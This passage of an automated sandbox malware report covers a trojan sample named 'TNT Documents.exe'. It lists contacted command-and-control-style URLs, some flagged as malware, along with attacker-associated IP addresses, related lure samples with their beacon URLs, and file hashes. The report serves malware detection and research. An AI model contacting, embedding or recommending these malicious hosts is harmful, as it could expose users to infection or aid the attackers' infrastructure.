http://www.coached.info/how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd | false | Avira URL Cloud: safe | unknown
www.floridanratraining.com/how6/ | true | Avira URL Cloud: safe | low
http://www.metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd | true | Avira URL Cloud: safe | unknown
http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | true | Avira URL Cloud: malware | unknown
http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comI.TTF | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.sajatypeworks.comus4 | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnar | TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cn9 | TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/soft | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.founder.c | TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnG | TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.comx | TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/slnt | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.de2 | TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/ | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comF( | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.founder.com.cn/cna | TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/( | TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.coma | TNT Documents.exe, 00000000.00000003.255624814.000000000061D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnaX | TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.de | TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264211544.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264143037.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267332900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267369494.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264092600.000000000548E000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264299140.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | TNT Documents.exe, 00000000.00000003.262108739.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262382693.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262663913.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262518900.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.262298913.0000000005482000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com= | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designerss | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comcomo? | TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/M | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/F | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comd | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.comX | TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmp | false | | high
http://www.monotype. | TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265384324.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265335700.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/.comp | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.comU | TNT Documents.exe, 00000000.00000003.260239394.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260165692.000000000548B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | TNT Documents.exe, 00000000.00000003.261184837.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260815877.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261253354.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261554899.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.261076042.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.260888751.0000000005475000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.der | TNT Documents.exe, 00000000.00000003.267219915.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267251164.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267168059.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267284938.0000000005482000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.como | TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cno. | TNT Documents.exe, 00000000.00000003.259236141.000000000547E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comals | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comic | TNT Documents.exe, 00000000.00000003.260092488.000000000548B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/ | TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comitud | TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
119.18.54.99 | metronixmedical.com | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
34.102.136.180 | coached.info | United States | 15169 | GOOGLEUS | false
51.255.30.106 | cortepuroiberico.com | France | 16276 | OVHFR | true
209.17.116.163 | www.specialtyplastics.online | United States | 55002 | DEFENSE-NETUS | true

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532859
Start date: 02.12.2021
Start time: 18:56:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 53s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TNT Documents.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/1@10/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.7% (good quality ratio 7.7%)
• Quality average: 72.4%
• Quality standard deviation: 32.8%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
18:57:58 | API Interceptor | 1x Sleep call for process: TNT Documents.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
209.17.116.163 | RFQ - SST#2021111503.exe | malicious | www.edukado.online/teni/?1bSD0d6p=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RDvSqSrk2xiP&jJB=9r9x5R
(same) | yVvATSvedsfMg0l.exe | malicious | www.ichelbrousset.com/czh8/?h0DX=irrd3yuyc1GImfABIedh2a+c4kF1IqLY7IOBv/DJSDLKV1P8G+/4s2D0JrIDDvMvFjLtzXE2ZQ==&UpZ=4hzll
(same) | DZqb1YCMJknskFE.exe | malicious | www.alvarezdelugo.store/9mj8/?b61TGp=UkZThqrRocv5vk1faiVRq9+iiPL+c1gbqU90ov2hL2y42KpkYKZbBF4nZ16GjYtZO51IIqH2Lg==&2dXl=-Zt00jOpTfntw
(same) | DHL Documents.exe | malicious | www.specialtyplastics.online/how6/?l2Jl=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnzra08qQhypJ&Tf5pq=W6zlk8Rp
(same) | Dhl_AWB5032675620,pdf.exe | malicious | www.durston.store/b62n/?t64PStG=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJL2Tixlbzc&Sp=4hX0vf
(same) | vbc.exe | malicious | www.applebroog.industries/fqiq/?2d=0RH9gkF6jVnFZMBLg5arrRt8ci9oBvnO845D4NtwM1wnd4qumJjOU8GaWcQJQdSDPFjg&KBZh8h=9rFxIRS8frv8A02
(same) | TT_SWIFT_Export Order_noref S10SMG00318021.exe | malicious | www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y
(same) | Nuevo Pedido.exe | malicious | www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN
(same) | Payment Advice.doc | malicious | www.nihonkoryu.site/cy88/?JpCxc=UdPBVTbj1CZF+opyLZ3z0qAaJaL/JpkwFii79QX209xtQVaMtZARr5G5+pIvOlE0oIFN3g==&9rl=-Z8xBfo8a6
(same) | 68886.xlsx | malicious | www.viscoent.online/scb0/?bXi=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&PB=hxoT
(same) | PO_No.202201EYL-01_ABW.exe | malicious | www.aarondecker.online/46uq/?j6Al=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzXbE6MukZnWf&4hqTJ=PpNtRPgx0VJ
(same) | rfq.exe | malicious | www.eloiseball.online/s2qi/?MhBd9XLx=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA&SR=d0DLMt
(same) | New Order.xlsx | malicious | www.viscoent.online/scb0/?NN6=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&lFND1Z=6lPhL
(same) | PO202104-114 - APQ Comercial Apoquindo,pdf.exe | malicious | www.durston.store/b62n/?ChJte=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJhpjSxhZ7c&d6A=SJExlzkP
(same) | As5zvmxhPo.exe | malicious | www.scbcommunity.partners/xgmi/?SzrxP8lx=ibySZgQScShq1lS4qM2nT1qHIBOXZbGjkidZCxDm/G3nGy75y5MD+ijFjtG1ArxxbKo6&tTbDp=7nf8x
(same) | SWIFT-MLSB-11,546.doc | malicious | www.howellenterprises.biz/cy88/?0deDKH=f2Jd-DLxZJsXUZ&cjXL1rR=fkUWIEJ3aTmqc1Hb/8mQzV6AtAV96QXeCAvCSnvV4vLU/JJ/qpHHTJ9bGgGB5MvhUhf5fg==
(same) | SHIPMENT ARRIVAL NOTICE - ORIGINAL DOCUMENTS__pdf.exe | malicious | www.gzsz.online/ubw4/?cR-H=RPx2ZUkBCpbabyLVYaiQALpYpcukYHUKRCHGI7PR5DR61tf9OEQgp5XPT5XPjlBrfWaDsOZcvg==&G4=q6PdCh7
(same) | Quote request.exe | malicious | www.eloiseball.online/s2qi/?lZwxYz=y6AldH-&TJELpfLP=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA
(same) | scan_21000076119_pdf.exe | malicious | www.edukado.online/teni/?3fx8BFd=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RAPo6DLcsWDI&A6U89=j2JXRdWhjhk8k
(same) | NEW ORDER 2021.exe | malicious | www.metalworkingadditives.online/b2c0/?N0=tQ9OUq/fzxn+R82X6GTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ad1zpKElTcI&o48=QhiPALAplp

Domains

Match | Associated Sample Name / URL | Detection | Context
www.specialtyplastics.online | DHL Documents.exe | malicious | 209.17.116.163

ASN

Match | Associated Sample Name / URL | Detection | Context
PUBLIC-DOMAIN-REGISTRYUS | Dhl Document.exe | malicious | 208.91.199.224
(same) | DHL Waybill receipt.exe | malicious | 208.91.199.223
(same) | Shipping Document BL Copy.exe | malicious | 103.195.185.115
(same) | DHL SHIPMENT NOTIFICATION 284748395PD.exe | malicious | 208.91.199.223
(same) | SHIPPING DOCUMENT & PL.exe | malicious | 103.195.185.115
(same) | Swift MT103 pdf.exe | malicious | 208.91.199.225
(same) | Scan096355.exe | malicious | 208.91.199.225
(same) | yYa94CeATF8h2NA.exe | malicious | 208.91.199.223
(same) | part-1500645108.xlsb | malicious | 103.76.231.42
(same) | part-1500645108.xlsb | malicious | 103.76.231.42
(same) | item-40567503.xlsb | malicious | 162.215.254.201
(same) | item-40567503.xlsb | malicious | 162.215.254.201
(same) | PG4636 - Confirmed .xls.exe | malicious | 208.91.198.143
(same) | item-107262298.xlsb | malicious | 162.215.254.201
(same) | item-107262298.xlsb | malicious | 162.215.254.201
(same) | item-1202816963.xlsb | malicious | 162.215.254.201
(same) | item-1202816963.xlsb | malicious | 162.215.254.201
(same) | DHL Receipt.html | malicious | 199.79.62.126
(same) | BOQ.exe | malicious | 208.91.199.223
(same) | RFQ-Spares and tools.exe | malicious | 208.91.198.143
OVHFR | ClaimCopy-1848214335-12022021.xlsb | malicious | 158.69.133.78
(same) | ClaimCopy-1848214335-12022021.xlsb | malicious | 158.69.133.78
(same) | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
(same) | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
(same) | ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
(same) | reg.exe | malicious | 213.186.33.5
(same) | REQUEST FOR SPECIFICATION.exe | malicious | 213.251.158.218
(same) | ETgVKIYRW5.dll | malicious | 149.56.106.83
(same) | cMVyW1SDZz.dll | malicious | 149.56.106.83
(same) | ETgVKIYRW5.dll | malicious | 149.56.106.83
(same) | cMVyW1SDZz.dll | malicious | 149.56.106.83
(same) | 2iJBYBel22.dll | malicious | 149.56.106.83
(same) | 2iJBYBel22.dll | malicious | 149.56.106.83
(same) | Tender SN980018277 & SN9901827 Signed Copy.exe | malicious | 51.161.104.181
(same) | Invoice.exe | malicious | 54.38.220.85
(same) | AegEywmjUJ.exe | malicious | 51.79.99.124
(same) | P.O SPECIFICATION.xlsx | malicious | 51.79.99.124
(same) | DC-330NC.xlsx | malicious | 51.79.99.124
(same) | FILE_915494026923219.xlsm | malicious | 158.69.222.101
(same) | UioA2E9DBG.dll | malicious | 158.69.222.101

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
Process: C:\Users\user\Desktop\TNT Documents.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, 